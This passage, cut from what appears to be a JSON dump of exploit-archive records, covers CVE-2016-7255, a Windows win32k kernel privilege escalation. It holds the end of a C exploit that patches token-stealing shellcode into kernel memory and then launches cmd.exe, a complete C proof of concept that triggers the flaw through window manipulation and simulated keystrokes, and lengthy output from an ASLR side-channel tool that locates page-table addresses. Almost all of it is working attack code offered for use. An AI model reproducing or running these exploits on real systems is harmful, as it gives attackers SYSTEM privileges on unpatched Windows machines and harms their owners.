0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n // in case the OS version is not any of the previously checked versions\r\n else\r\n {\r\n printf(\" [-] Unsupported version\\n\");\r\n printf(\" [*] Affected 64-bit operating systems\\n\");\r\n printf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\");\r\n printf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\");\r\n printf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\");\r\n printf(\" [*] Windows 2012 R2 -- cve-2016-7255.exe 12\\n\");\r\n return -1;\r\n }\r\n \r\n printf(\"My PID is: %d\\n\", GetCurrentProcessId());\r\n GetUserName(pre_username, &size);\r\n printf(\"Current Username: %s\\n\", pre_username);\r\n printf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF);\r\n printf(\"Shellcode stored at: %p\\n\", (void *) &shellcode);\r\n printf(\"Enter to continue...\\n\");\r\n getchar();\r\n \r\n do\r\n {\r\n or_address_value_4((void*)PML4_SELF_REF);\r\n } while (FALSE);\r\n \r\n PML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);\r\n printf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX);\r\n PML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);\r\n \r\n UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);\r\n \r\n printf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer);\r\n DWORD pid = GetCurrentProcessId();\r\n \r\n /* Shellcode Patching !! 
*/\r\n char *p = shellcode;\r\n p += 4; // skip the CLI, PUSHF and MOV RAX bytes \r\n *(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1\r\n \r\n p += 12; // Patch shellcode with original value in the Overwrite address\r\n *(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);\r\n \r\n p += 12; // To patch the PID of our process\r\n \r\n *(DWORD *)p = (DWORD)pid;\r\n \r\n p += 17;\r\n *(unsigned char *)p = (unsigned char)sc_KPROCESS;\r\n \r\n p += 7;\r\n *(unsigned int *)p = (unsigned int)sc_APLINKS;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n UINT64 shellcode_va = store_shellcode_in_hal();\r\n printf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va);\r\n overwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);\r\n \r\n if (osversion == 7){\r\n // Exploit Win7.1\r\n hNtDll = LoadLibrary(\"ntdll.dll\");\r\n \r\n if (!hNtDll) {\r\n printf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\");\r\n \r\n if (!NtQueryIntervalProfile) {\r\n printf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n } \r\n NtQueryIntervalProfile(0x1337, &Interval);\r\n }\r\n \r\n \r\n while (1) {\r\n size = 256;\r\n GetUserName(post_username, &size);\r\n if (memcmp(post_username, pre_username, 256) != 0) break;\r\n }\r\n Sleep(2000);\r\n system(\"cmd.exe\");\r\n \r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-01-04] #", "sourceHref": "https://0day.today/exploit/26645", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-03T09:00:04", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2016-11-10T00:00:00", "type": "zdt", "title": "Microsoft 
Windows Kernel - win32k Denial of Service (MS16-135) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7255"], "modified": "2016-11-10T00:00:00", "id": "1337DAY-ID-26297", "href": "https://0day.today/exploit/description/26297", "sourceData": "/*\r\nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n \r\nFull Proof of Concept:\r\n \r\nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40745.zip\r\n \r\n********************************************************************\r\n Created: 2016-11-09 14:23:09\r\n Filename: main.c\r\n Author: root[at]TinySec.net\r\n Version 0.0.0.1\r\n Purpose: poc of cve-2016-0075\r\n*********************************************************************\r\n*/\r\n \r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n \r\n \r\n//////////////////////////////////////////////////////////////////////////\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n \r\n#undef DbgPrint\r\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... 
);\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n CHAR* pszDbgBuff = NULL;\r\n va_list VaList=NULL;\r\n ULONG ulRet = 0;\r\n \r\n do\r\n {\r\n pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\r\n if (NULL == pszDbgBuff)\r\n {\r\n break;\r\n }\r\n RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\r\n \r\n va_start(VaList,Format);\r\n \r\n _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\r\n \r\n DbgPrintEx(77 , 0 , pszDbgBuff );\r\n OutputDebugStringA(pszDbgBuff);\r\n \r\n va_end(VaList);\r\n \r\n } while (FALSE);\r\n \r\n if (NULL != pszDbgBuff)\r\n {\r\n HeapFree( GetProcessHeap(), 0 , pszDbgBuff );\r\n pszDbgBuff = NULL;\r\n }\r\n \r\n return ulRet;\r\n}\r\n \r\n \r\n int _sim_key_down(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = 0;\r\n \r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n int _sim_key_up(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n \r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n int _sim_alt_shift_esc()\r\n {\r\n int i = 0;\r\n \r\n do\r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n \r\n \r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n \r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n \r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n \r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n \r\n \r\n int _sim_alt_shift_tab(int nCount)\r\n {\r\n int i = 0;\r\n HWND hWnd = NULL;\r\n \r\n \r\n int nFinalRet = -1;\r\n \r\n do\r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n \r\n \r\n for ( i = 0; i < nCount ; i++)\r\n {\r\n _sim_key_down( VK_TAB);\r\n _sim_key_up( VK_TAB);\r\n \r\n 
Sleep(1000);\r\n \r\n }\r\n \r\n \r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n } while (FALSE);\r\n \r\n return nFinalRet;\r\n}\r\n \r\n \r\n \r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n WNDCLASSEXW stWC = {0};\r\n \r\n HWND hWndParent = NULL;\r\n HWND hWndChild = NULL;\r\n \r\n WCHAR* pszClassName = L\"cve-2016-7255\";\r\n WCHAR* pszTitleName = L\"cve-2016-7255\";\r\n \r\n void* pId = NULL;\r\n MSG stMsg = {0};\r\n \r\n do\r\n {\r\n \r\n stWC.cbSize = sizeof(stWC);\r\n stWC.lpfnWndProc = DefWindowProcW;\r\n stWC.lpszClassName = pszClassName;\r\n \r\n if ( 0 == RegisterClassExW(&stWC) )\r\n {\r\n break;\r\n }\r\n \r\n hWndParent = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n NULL,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE,\r\n 0,\r\n 0,\r\n 360,\r\n 360,\r\n NULL,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndParent)\r\n {\r\n break;\r\n }\r\n \r\n hWndChild = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n pszTitleName,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\r\n 0,\r\n 0,\r\n 160,\r\n 160,\r\n hWndParent,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndChild)\r\n {\r\n break;\r\n }\r\n \r\n #ifdef _WIN64\r\n pId = ( (UCHAR*)pAddress - 0x28 ); \r\n #else\r\n pId = ( (UCHAR*)pAddress - 0x14); \r\n #endif // #ifdef _WIN64\r\n \r\n SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\r\n \r\n DbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\r\n DebugBreak();\r\n \r\n ShowWindow(hWndParent , SW_SHOWNORMAL);\r\n \r\n SetParent(hWndChild , GetDesktopWindow() );\r\n \r\n SetForegroundWindow(hWndChild);\r\n \r\n _sim_alt_shift_tab(4);\r\n \r\n SwitchToThisWindow(hWndChild , TRUE);\r\n \r\n _sim_alt_shift_esc();\r\n \r\n \r\n while( GetMessage(&stMsg , NULL , 0 , 0) )\r\n { \r\n TranslateMessage(&stMsg);\r\n DispatchMessage(&stMsg);\r\n }\r\n \r\n \r\n } while (FALSE);\r\n \r\n if ( NULL != hWndParent )\r\n {\r\n DestroyWindow(hWndParent);\r\n hWndParent = NULL;\r\n }\r\n \r\n if ( 
NULL != hWndChild )\r\n {\r\n DestroyWindow(hWndChild);\r\n hWndChild = NULL;\r\n }\r\n \r\n UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\r\n \r\n return 0;\r\n}\r\n \r\nint __cdecl wmain(int nArgc, WCHAR** Argv)\r\n{\r\n do\r\n {\r\n or_address_value_4( (void*)0xFFFFFFFF );\r\n } while (FALSE);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/26297", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-18T17:25:55", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2016-11-24T00:00:00", "type": "zdt", "title": "Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-13", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7255"], "modified": "2016-11-24T00:00:00", "id": "1337DAY-ID-26414", "href": "https://0day.today/exploit/description/26414", "sourceData": "Complete Proof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40823.zip\r\n \r\nI Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016\r\n \r\nRequirements\r\n \r\nIntel Processor (Haswell or newer)\r\nWindows 10 x64\r\nUsage\r\n \r\nRun ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry:\r\n \r\nC:\\Users\\qa\\Desktop>ASLRSideChannelAttack.exe\r\n+] Setting thread affinity to CPU 0\r\n+] Getting all the potential PML4 SelfRef\r\n+] Mapping a page oracle\r\n+] Allocating probing target pages...\r\nAllocation 0: 0000020E339D0000\r\nAllocation 1: 0000020E339E0000\r\nAllocation 2: 0000020E339F0000\r\nAllocation 3: 0000020E33A00000\r\nAllocation 4: 0000020E33A10000\r\n--------------------------\r\n+] Check that Unammped and Mapped values are consistent across several executions!\r\n--------------------------\r\nUnmapped Initial: 256.683746\r\nMapped Initial: 
203.692978\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 247.440018\r\nMapped: 202.827560\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213\r\n+] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563\r\n+] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382\r\n+] PTE FFFF81010719D000 looks mapped! - Time: 197.297256\r\n+] PTE FFFF81010719D080 looks mapped! - Time: 194.501175\r\n+] PTE FFFF810804020100 looks mapped! - Time: 204.740097\r\n+] Removing 102 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF81C0E0703818\r\n+] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616\r\n+] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774\r\n+] PTE FFFF81810719CF80 looks mapped! - Time: 208.949921\r\n+] PTE FFFF81810719D000 looks mapped! - Time: 202.525726\r\n+] PTE FFFF81810719D080 looks mapped! - Time: 208.673874\r\nTime difference exceed for ffff818804020100, retrying...\r\n+] PTE FFFF818804020100 looks mapped! - Time: 209.071213\r\n+] Removing 103 from initial array and pushing it into final array\r\nTime difference exceed for ffff824120904820, retrying...\r\nPotential SelfRef: FFFF824120904820\r\n+] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642\r\nTime difference exceed for ffff82010719cf00, retrying...\r\n+] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593\r\n+] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344\r\n+] PTE FFFF82010719D000 looks mapped! - Time: 207.820862\r\n+] PTE FFFF82010719D080 looks mapped! - Time: 197.229263\r\n+] PTE FFFF820804020100 looks mapped! 
- Time: 204.585739\r\n+] Removing 104 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003\r\nTime difference exceed for ffff8341a0d06830, retrying...\r\nPotential SelfRef: FFFF8341A0D06830\r\n+] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657\r\n+] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697\r\n+] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016\r\n+] PTE FFFF83010719D000 looks mapped! - Time: 214.013504\r\n+] PTE FFFF83010719D080 looks mapped! - Time: 191.688126\r\n+] PTE FFFF830804020100 looks mapped! - Time: 193.314758\r\n+] Removing 106 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973\r\n+] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693\r\n+] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097\r\n+] PTE FFFF83810719D000 looks mapped! - Time: 216.298660\r\n+] PTE FFFF83810719D080 looks mapped! - Time: 203.848816\r\n+] PTE FFFF838804020100 looks mapped! - Time: 204.008743\r\n+] Removing 107 from initial array and pushing it into final array\r\nTime difference exceed for ffff89c4e2713898, retrying...\r\nTime difference exceed for ffff8bc5e2f178b8, retrying...\r\nTime difference exceed for ffff8c46231188c0, retrying...\r\nUnmapped Initial: 248.508636\r\nMapped Initial: 207.139847\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 236.360733\r\nMapped: 195.650040\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! 
- Time: 197.312363\r\nPotential SelfRef: FFFF81C0E0703818\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\n+] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393\r\nTime difference exceed for ffff81810719cf00, retrying...\r\n+] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645\r\n+] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724\r\n+] PTE FFFF81810719D000 looks mapped! - Time: 197.655167\r\n+] PTE FFFF81810719D080 looks mapped! - Time: 201.667160\r\n+] PTE FFFF818804020100 looks mapped! - Time: 195.728439\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF81C0E0703818 - Index: 103\r\nPML4e: FFFF824120904820 - Index: 104\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff818000000000\r\n-] Erasing 103 from final array\r\nPotential SelfRef: FFFF824120904820\r\n+] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759\r\n+] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019\r\n+] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364\r\n+] PTE FFFF82010719D000 looks mapped! - Time: 203.052826\r\n+] PTE FFFF82010719D080 looks mapped! - Time: 194.115143\r\n+] PTE FFFF820804020100 looks mapped! - Time: 198.158585\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF824120904820 - Index: 104\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff820000000000\r\n-] Erasing 104 from final array\r\nPotential SelfRef: FFFF8341A0D06830\r\n+] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823\r\n+] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525\r\n+] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040\r\n+] PTE FFFF83010719D000 looks mapped! - Time: 196.066254\r\n+] PTE FFFF83010719D080 looks mapped! 
- Time: 189.007034\r\n+] PTE FFFF830804020100 looks mapped! - Time: 197.613953\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff830000000000\r\n-] Erasing 106 from final array\r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380\r\nTime difference exceed for ffff83810719cf00, retrying...\r\nTime difference exceed for ffff83810719cf00, retrying...\r\nUnmapped Initial: 232.123840\r\nMapped Initial: 196.420654\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 234.845581\r\nMapped: 187.862518\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938\r\n+] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766\r\nTime difference exceed for ffff81010719cf80, retrying...\r\nTime difference exceed for ffff81010719cf80, retrying...\r\nTime difference exceed for ffff81010719cf80, retrying...\r\n+] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784\r\n+] PTE FFFF81010719D000 looks mapped! - Time: 194.332733\r\n+] PTE FFFF81010719D080 looks mapped! - Time: 200.211182\r\n+] PTE FFFF810804020100 looks mapped! 
- Time: 199.812225\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff810000000000\r\nTime difference exceed for ffff810000000000, retrying...\r\n-] Erasing 102 from final array\r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nPotential SelfRef: FFFF83C1E0F07838\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nUnmapped Initial: 230.247162\r\nMapped Initial: 198.023987\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 235.923035\r\nMapped: 191.605301\r\n--------------------------\r\n \r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nPotential SelfRef: FFFF83C1E0F07838\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nUnmapped Initial: 258.041046\r\nMapped Initial: 210.309753\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 238.757538\r\nMapped: 203.896240\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102\r\n+] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836\r\n+] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333\r\n+] PTE FFFF83810719D000 looks mapped! 
- Time: 197.218445\r\n+] PTE FFFF83810719D080 looks mapped! - Time: 203.334763\r\n+] PTE FFFF838804020100 looks mapped! - Time: 203.243607\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff838000000000\r\n-] Erasing 107 from final array\r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221\r\n+] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138\r\n+] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006\r\n+] PTE FFFF82810719D000 looks mapped! - Time: 209.909943\r\n+] PTE FFFF82810719D080 looks mapped! - Time: 202.795639\r\n+] PTE FFFF828804020100 looks mapped! - Time: 196.754044\r\n+] Removing 105 from initial array and pushing it into final array\r\nTime difference exceed for ffff884422110880, retrying...\r\nTime difference exceed for ffff884422110880, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff90c864321908, retrying...\r\nUnmapped Initial: 257.754272\r\nMapped Initial: 207.903702\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 247.145935\r\nMapped: 207.792923\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092\r\n+] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715\r\n+] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614\r\n+] PTE FFFF82810719D000 looks mapped! - Time: 213.698837\r\n+] PTE FFFF82810719D080 looks mapped! - Time: 210.162796\r\n+] PTE FFFF828804020100 looks mapped! 
- Time: 208.765045\r\nPML4e: FFFF82C160B05828 - Index: 105\r\nKNOWN_UNMAPPED PTE: ffff828000000000\r\n-] Erasing 105 from final array\r\n-] Removing 100 as it seems to be unmapped\r\n-] Removing 101 as it seems to be unmapped\r\n-] Removing 108 as it seems to be unmapped\r\n-] Removing 109 as it seems to be unmapped\r\n-] Removing 10a as it seems to be unmapped\r\n-] Removing 10b as it seems to be unmapped\r\n-] Removing 10c as it seems to be unmapped\r\n-] Removing 10d as it seems to be unmapped\r\nTime difference exceed for ffff8743a1d0e870, retrying...\r\n-] Removing 10e as it seems to be unmapped\r\n-] Removing 10f as it seems to be unmapped\r\n-] Removing 110 as it seems to be unmapped\r\nTime difference exceed for ffff88c462311888, retrying...\r\n-] Removing 111 as it seems to be unmapped\r\n-] Removing 112 as it seems to be unmapped\r\n-] Removing 113 as it seems to be unmapped\r\nTime difference exceed for ffff8a45229148a0, retrying...\r\n-] Removing 114 as it seems to be unmapped\r\n-] Removing 115 as it seems to be unmapped\r\n-] Removing 116 as it seems to be unmapped\r\n-] Removing 117 as it seems to be unmapped\r\nTime difference exceed for ffffbc5e2f178bc0, retrying...\r\nTime difference exceed for ffffbc5e2f178bc0, retrying...\r\nTime difference exceed for ffffe8f47a3d1e88, retrying...\r\nPotential SelfRef: FFFFF67B3D9ECF60\r\n+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379\r\n+] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694\r\n+] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502\r\n+] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920\r\n+] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059\r\n+] PTE FFFFF60804020100 looks mapped! 
- Time: 211.636246\r\n+] Removing 1ec from initial array and pushing it into final array\r\nUnmapped Initial: 233.678802\r\nMapped Initial: 214.496124\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 250.585373\r\nMapped: 213.339661\r\n--------------------------\r\n \r\nPotential SelfRef: FFFFF67B3D9ECF60\r\n+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174\r\n+] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457\r\n+] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861\r\n+] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334\r\n+] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160\r\n+] PTE FFFFF60804020100 looks mapped! - Time: 204.036926\r\nPML4e: FFFFF67B3D9ECF60 - Index: 1ec\r\nKNOWN_UNMAPPED PTE: fffff60000000000\r\nReal PML4 SelfRef Found: fffff67b3d9ecf60\r\nLeft in Potential Array: ffff8c46231188c0\r\nLeft in Potential Array: ffff8cc6633198c8\r\nLeft in Potential Array: ffff8d46a351a8d0\r\nLeft in Potential Array: ffff8dc6e371b8d8\r\nLeft in Potential Array: ffff8e472391c8e0\r\nLeft in Potential Array: ffff8ec763b1d8e8\r\nLeft in Potential Array: ffff8f47a3d1e8f0\r\nLeft in Potential Array: ffff8fc7e3f1f8f8\r\nLeft in Potential Array: ffff904824120900\r\nLeft in Potential Array: ffff90c864321908\r\nLeft in Potential Array: ffff9148a4522910\r\nLeft in Potential Array: ffff91c8e4723918\r\nLeft in Potential Array: ffff924924924920\r\nLeft in Potential Array: ffff92c964b25928\r\nLeft in Potential Array: ffff9349a4d26930\r\nLeft in Potential Array: ffff93c9e4f27938\r\nLeft in Potential Array: ffff944a25128940\r\nLeft in Potential Array: ffff94ca65329948\r\nLeft in Potential Array: ffff954aa552a950\r\nLeft in Potential Array: ffff95cae572b958\r\nLeft in Potential Array: 
ffff964b2592c960\r\nLeft in Potential Array: ffff96cb65b2d968\r\nLeft in Potential Array: ffff974ba5d2e970\r\nLeft in Potential Array: ffff97cbe5f2f978\r\nLeft in Potential Array: ffff984c26130980\r\nLeft in Potential Array: ffff98cc66331988\r\nLeft in Potential Array: ffff994ca6532990\r\nLeft in Potential Array: ffff99cce6733998\r\nLeft in Potential Array: ffff9a4d269349a0\r\nLeft in Potential Array: ffff9acd66b359a8\r\nLeft in Potential Array: ffff9b4da6d369b0\r\nLeft in Potential Array: ffff9bcde6f379b8\r\nLeft in Potential Array: ffff9c4e271389c0\r\nLeft in Potential Array: ffff9cce673399c8\r\nLeft in Potential Array: ffff9d4ea753a9d0\r\nLeft in Potential Array: ffff9dcee773b9d8\r\nLeft in Potential Array: ffff9e4f2793c9e0\r\nLeft in Potential Array: ffff9ecf67b3d9e8\r\nLeft in Potential Array: ffff9f4fa7d3e9f0\r\nLeft in Potential Array: ffff9fcfe7f3f9f8\r\nLeft in Potential Array: ffffa05028140a00\r\nLeft in Potential Array: ffffa0d068341a08\r\nLeft in Potential Array: ffffa150a8542a10\r\nLeft in Potential Array: ffffa1d0e8743a18\r\nLeft in Potential Array: ffffa25128944a20\r\nLeft in Potential Array: ffffa2d168b45a28\r\nLeft in Potential Array: ffffa351a8d46a30\r\nLeft in Potential Array: ffffa3d1e8f47a38\r\nLeft in Potential Array: ffffa45229148a40\r\nLeft in Potential Array: ffffa4d269349a48\r\nLeft in Potential Array: ffffa552a954aa50\r\nLeft in Potential Array: ffffa5d2e974ba58\r\nLeft in Potential Array: ffffa6532994ca60\r\nLeft in Potential Array: ffffa6d369b4da68\r\nLeft in Potential Array: ffffa753a9d4ea70\r\nLeft in Potential Array: 